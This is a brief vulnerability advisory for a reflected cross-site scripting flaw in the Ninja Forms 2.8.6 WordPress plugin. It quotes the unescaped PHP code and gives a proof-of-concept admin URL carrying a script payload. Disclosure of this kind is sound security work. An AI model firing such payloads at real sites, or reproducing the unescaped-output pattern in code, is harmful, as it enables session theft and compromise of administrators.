Ninja Forms 2.8.6 Reflected XSS

Homepage:

https://wordpress.org/plugins/ninja-forms/

CVE-ID

CVE-2014-8815

CVSS Score

3.5

CVSS Vector

(AV:N/AC:M/Au:S/C:P/I:N/A:N)

Description:

$_REQUEST['update_message'] is not escaped.

File: ninja-forms\includes\admin\admin.php

if( !isset( $ninja_forms_admin_update_message ) AND isset( $_REQUEST['update_message'] ) ){
	$ninja_forms_admin_update_message = $_REQUEST['update_message'];
}
if( isset( $ninja_forms_admin_update_message ) AND $ninja_forms_admin_update_message != '' ){
	?>
	<div id="message" class="updated below-h2">
		<p>
			<?php echo $ninja_forms_admin_update_message;?>
		</p>
	</div>
	<?php
}

Proof of Concept:

Reflected XSS is visible only for admin:

http://wordpress-instalation/wp-admin/admin.php?page=ninja-forms&update_message=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E

Timeline: